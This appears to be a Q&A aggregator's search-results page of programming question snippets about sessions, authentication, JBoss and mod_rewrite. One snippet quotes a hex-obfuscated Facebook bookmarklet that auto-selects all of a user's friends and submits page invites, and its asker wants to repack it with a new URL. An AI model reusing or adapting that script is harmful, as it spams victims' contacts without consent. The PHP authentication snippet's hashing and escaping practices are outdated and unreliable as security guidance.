Search Results

Search found 15797 results on 632 pages for 'session variables'.

Page 87/632 | < Previous Page | 83 84 85 86 87 88 89 90 91 92 93 94  | Next Page >

  • What are the weaknesses of this user authentication method?

    - by byronh
    I'm developing my own PHP framework. It seems all the security articles I have read use vastly different methods for user authentication than I do so I could use some help in finding security holes. Some information that might be useful before I start. I use mod_rewrite for my MVC url's. Passwords are sha1 and md5 encrypted with 24 character salt unique to each user. mysql_real_escape_string and/or variable typecasting on everything going in, and htmlspecialchars on everything coming out. Step-by step process: Top of every page: session_start(); session_regenerate_id(); If user logs in via login form, generate new random token to put in user's MySQL row. Hash is generated based on user's salt (from when they first registered) and the new token. Store the hash and plaintext username in session variables, and duplicate in cookies if 'Remember me' is checked. On every page, check for cookies. If cookies set, copy their values into session variables. Then compare $_SESSION['name'] and $_SESSION['hash'] against MySQL database. Destroy all cookies and session variables if they don't match so they have to log in again. If login is valid, some of the user's information from the MySQL database is stored in an array for easy access. So far, I've assumed that this array is clean so when limiting user access I refer to user.rank and deny access if it's below what's required for that page. I've tried to test all the common attacks like XSS and CSRF, but maybe I'm just not good enough at hacking my own site! My system seems way too simple for it to actually be secure (the security code is only 100 lines long). What am I missing? I've also spent alot of time searching for the vulnerabilities with mysql_real_escape string but I haven't found any information that is up-to-date (everything is from several years ago at least and has apparently been fixed). All I know is that the problem was something to do with encoding. If that problem still exists today, how can I avoid it? Any help will be much appreciated.

    Read the article

  • Facebook JS SDK FB.logout() doesn't terminate user session

    - by Casey Flynn
    I'm attempting to log a user out of facebook with the Facebook JS SDK, however calling: FB.logout(function(response){ console.log(response); }); returns: response.status == "connected" And only after refreshing the page does the SDK realize that the session has ended. Anyone know what could be causing this behavior? This code previously worked in my application and has recently started behaving this way. Another example using FireBug:

    Read the article

  • PHP Login, Store Session Variables.

    - by Andreas Carlbom
    Yo. I'm trying to make a simple login system in PHP and my problem is this: I don't really understand sessions. Now, when I log a user in, I run session_register("user"); but I don't really understand what I'm up to. Does that session variable contain any identifiable information, so that I for example can get it out via $_SESSION["user"] or will I have to store the username in a separate variable? Thanks.

    Read the article

  • Memory address of a variable

    - by dotnetvoyager
    Hi Everyone, Is it possible to get the memory address of a variable in C#. What I am trying to do is very simple. I want to declare variables of type Double, Float, Decimal and assign the value 1.1 to each of these variables. Then I would like to go and see how these values are represented in memory. I need to get the memory address of the variable in order to see how its stored in memory. Once I have the memory address I plan to put a break point in the code and use the Debug - Windows - Memory option in visual studio to see how the numbers are stored in memory. Cheers,

    Read the article

  • what's the .Rtr file for R session log?

    - by ahala
    I use Eclipse/statet R plug in on Windows. In my home directory, there are .Rtr extension files that automatically generated for every R session. file names like yyyy-mm-dd hh-mm-ss.Rtr. Can someone give me any hint where there files come from? How did I enable it? thanks.

    Read the article

  • Javascript in address bar, how do I decipher?

    - by DoMx
    Hello stackoverflow! I have a javascript code that appears to be encrypted: javascript:var _0xe788=[&quot;\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C&quot;,&quot;\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x36\x38\x37\x38\x34\x39\x34\x39\x39\x32\x36\x35\x37\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E&quot;,&quot;\x73\x75\x67\x67\x65\x73\x74&quot;,&quot;\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73&quot;,&quot;\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74&quot;,&quot;\x63\x6C\x69\x63\x6B&quot;,&quot;\x69\x6E\x69\x74\x45\x76\x65\x6E\x74&quot;,&quot;\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74&quot;,&quot;\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C&quot;,&quot;\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D&quot;,&quot;\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70&quot;,&quot;\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67&quot;,&quot;\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E&quot;];var variables=[_0xe788[0],_0xe788[1],_0xe788[2],_0xe788[3],_0xe788[4],_0xe788[5],_0xe788[6],_0xe788[7],_0xe788[8],_0xe788[9],_0xe788[10],_0xe788[11],_0xe788[12],_0xe788[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0xe788[14]); I have seen similar instances and I have heard it may be Hex. I have been doing some google research and have found some online deciphers for Hex yet they all seem to struggle decrypting the code. I basically need to decipher this code, change some variables and repack it exactly how I found it but replacing a URL. How can I go about this? Are there any free online tools available? Many thanks.

    Read the article

  • Environment Variable to determine the OS type (Windows XP, Windows 7)

    - by Santhosh
    I want to differrntiate between Windows XP and Windows 7 in a XML file. Thought i will use an environment variable for it inside the XML. However I could not find any system environment variable defined in windows that gives this information. I see the %OSTYPE% variable but it is only available in Windows 7. It is not defined in XP. Is there anyway i could do this? Note that i would like a solution which purely depends on system environment variables. I do not want to create new variables based on executing some command, because i want to use this variable in a XML file.

    Read the article

  • Sending Javascript variables.

    - by shinjuo
    I have a page that allows a user to choose some things in a form and it will calculate the weight using javascript. It breaks it up into 5 variables that I need to send to another page. Originally I was just having it put the variable into a text box and then I was posting that text box. However I dont want to have 5 text boxes. So now I need to somehow send or post the five variables to another page. Here is my javascript function. I need to post weightBoxOne - weightBoxFive js function function getWeight(){ var weightBoxOne; var weightBoxTwo; var totalWeight; var box = .5; var quantity = document.dhform.quantity.value; var cardSize = document.dhform.cardSize.value; if(cardSize == 0.0141){ if(quantity <= 1000){ weightBoxOne = (quantity * cardSize) + box; totalWeight = weightBoxOne; }else if(quantity > 1000 && quantity <= 2000){ weightBoxOne = (1000 * cardSize) + box; weightBoxTwo = ((quantity - 1000) * cardSize) + box; totalWeight = weightBoxOne + weightBoxTwo; }else if(quantity > 2000 && quantity <= 3000){ weightBoxOne = (1000 * cardSize) + box; weightBoxTwo = (1000 * cardSize) + box; weightBoxThree = ((quantity - 2000) * cardSize) + box; totalWeight = weightBoxOne + weightBoxTwo + weightBoxThree; }else if(quantity > 3000 && quantity <= 4000){ weightBoxOne = (1000 * cardSize) + box; weightBoxTwo = (1000 * cardSize) + box; weightBoxThree = (1000 * cardSize) + box; weightBoxFour = ((quantity - 3000) * cardSize) + box; totalWeight = weightBoxOne + weightBoxTwo + weightBoxThree + weightBoxFour; }else{ weightBoxOne = (1000 * cardSize) + box; weightBoxTwo = (1000 * cardSize) + box; weightBoxThree = (1000 * cardSize) + box; weightBoxFour = (1000 * cardSize) + box; weightBoxFive = ((quantity - 4000) * cardSize) + box; totalWeight = weightBoxOne + weightBoxTwo + weightBoxThree + weightBoxFour + weightBoxFive; } }else if(cardSize == 0.00949){ if(quantity <= 4000){ weightBoxOne = (quantity * cardSize) + box; totalWeight = weightBoxOne; }else{ weightBoxOne = (4000 * cardSize) + box; weightBoxTwo = ((quantity - 4000) * cardSize) + box; totalWeight = weightBoxOne + weightBoxTwo; } } document.rates.weight.value = totalWeight; } //--> this is the form that was originally posting <form action="getRates.php" name="rates" method="post" onSubmit="popupform(this, 'join')"> <table style="width: 216px"> <tr> <td style="width: 115px; height: 49px;"><span class="style16">Weight</span><br/> <input type="text" id="weight" name="weight" size="10" maxlength="4"/> </td> <td align="right" style="width: 68px; height: 49px;" valign="top"><span class="style16">Zip Code</span><br/> <input type="text" id="zip" name="zip" size="10" maxlength="5"/> </td> </tr> <tr> <td style="width: 115px"> <input name="submit" type="submit" value="Get Rate Costs" style="width: 138px" />

    Read the article

  • Planning a requirements gathering session using Agile

    - by Dave Smith
    We are planning on introducing Agile into our development process (a shift from the waterfall we've been using so far). We are leaning towards a hybrid model in whcih the requirements gathering session is comprised of a business analyst, subject matter experts, technical person and a user interface person. The plan is to create user stories that the development team can use in their agile process with 1 month sprints. Has anyone had experience with a hybrid model? How has it worked for you so far?

    Read the article

  • Session or Query

    - by Khou
    Should I store the user's ID, name & email address in a session variable or should I query for the user's user's ID, name & email address everytime i need to use it?

    Read the article

  • Persisting sensitve data in asp.net, odd implementation

    - by rawsonstreet
    For reasons not in scope of this question I have implemented a .net project in an iframe which runs from a classic asp page. The classic asp site persisted a few sensitive values by hitting the db on each page. I have passed there variables as xml to the aspx page, now I need to make these values available on any page of this .net site. I've looked into the cache object but we are on a web farm so I am not sure it would work. Is there a way I can can instantiate an object in a base page class and have other pages inherit from the base page to access these values? What is the best way to persist these values? A few more points to consider the site runs in https mode and I cannot use session variables, and I would like to avoid cookies if possible..

    Read the article

  • Ajax progress with PHP session

    - by FFish
    I have an app that processes images and use jQuery to display progress to the user. I done this with writing to a textfile each time and image is processed and than read this status with a setInterval. Because no images are actually written in the processing (I do it in PHP's memory) I thought a log.txt would be a solution, but I am not sure about all the fopen and fread's. Is this prone to issues? I tried also with PHP sessions, but can't seem to get it to work, I don't get why.. HTML: <a class="download" href="#">request download</a> <p class="message"></p> JS: $('a.download').click(function() { var queryData = {images : ["001.jpg", "002.jpg", "003.jpg"]}; $("p.message").html("initializing..."); var progressCheck = function() { $.get("dynamic-session-progress.php", function(data) { $("p.message").html(data); } ); }; $.post('dynamic-session-process.php', queryData, function(intvalId) { return function(data) { $("p.message").html(data); clearInterval(intvalId); } } (setInterval(progressCheck, 1000)) ); return false; }); process.php: // session_start(); $arr = $_POST['images']; $arr_cnt = count($arr); $filename = "log.txt"; for ($i = 1; $i <= $arr_cnt; $i++) { $content = "processing $val ($i/$arr_cnt)"; $handle = fopen($filename, 'w'); fwrite($handle, $content); fclose($handle); // $_SESSION['counter'] = $content; sleep(3); // to mimic image processing } echo "<a href='#'>download zip</a>"; progress.php: // session_start(); $filename = "log.txt"; $handle = fopen($filename, "r"); $contents = fread($handle, filesize($filename)); fclose($handle); echo $contents; // echo $_SESSION['counter'];

    Read the article

  • Running JBoss 4.2.3 and JBoss 5.1 on the same server

    - by user115212
    I want to run JBoss 4.2.3 and JBoss 5.1 on the same server, but not simultaneously. I just need to be able to switch back and forth between the two for testing, so I don't need to change ports or anything like that. My problem is the JBOSS_HOME environment variable. When I set up a /soft/JBoss-4.2.3.GA directory and a /soft/JBoss-5.1.0.GA directory I can run the respective bin run.sh commands, however, both try to use the $JBOSS_HOME and $PATH environment variables which are set to the first installation (JBoss-4.2.3). So, how can I set separate environment variables? Or tell my new JBoss 5.1 installation to use another environment variable for JBOSS_HOME? How would I go about getting these two running together? Thanks!

    Read the article

  • FacebookRestClientException: A session key is required for calling this method in

    - by simple
    I have a app, that is used in the fanpage, so basically I am showing up the user request/invite form, after submission which refers to my server and I get friends ids(from $_POST) and info about user who sent invite, to get user info I am using $user = $this->_facebook->api_client->users_getLoggedInUser(); $dataToRetrive = array(....); $usersInfo = $this->_facebook->api_client->users_getInfo($user,$dataToRetrive); and then I redirect to fan page again in FF it is working fine but OPera and Chrome it is loosing the session.

    Read the article

  • Multiple mod rewrites in .htaccess

    - by Bob
    I want the following rules but I don't seem to get the right setup. <domain>/training-courses/ both with or without the slash at the end it should go to: <domain>/?index.php?page=training-courses and for each variable extra after this I want it to behave like this: <domain>/training-courses/success/another-value/and-yet-another/ to <domain>/?index.php?page=training-courses&val1=success&val2=another-value&val3=and-yet-another-value If it's not possible to have the option for unlimited leading variables, i'd like to have at least 2 variables after the page variable Is this possible? and how do I get this sorted out? I have this so far: RewriteEngine On RewriteRule ^test/([^/]*)/$ /test/index.php?pagina=$1&val1=$2 RewriteRule ^test/([^/]*)$ /test/index.php?pagina=$1&val1=$2 RewriteRule ^test/([^/]*)/([^/]*)/$ /test/index.php?pagina=$1&val1=$2 RewriteRule ^test/([^/]*)/([^/]*)$ /test/index.php?pagina=$1&val1=$2 RewriteRule ^test/([^/]*)/([^/]*)/([^/]*)/$ /test/index.php?pagina=$1&val1=$2&val2=$3 RewriteRule ^test/([^/]*)/([^/]*)/([^/]*)$ /test/index.php?pagina=$1&val1=$2&val2=$3

    Read the article

< Previous Page | 83 84 85 86 87 88 89 90 91 92 93 94  | Next Page >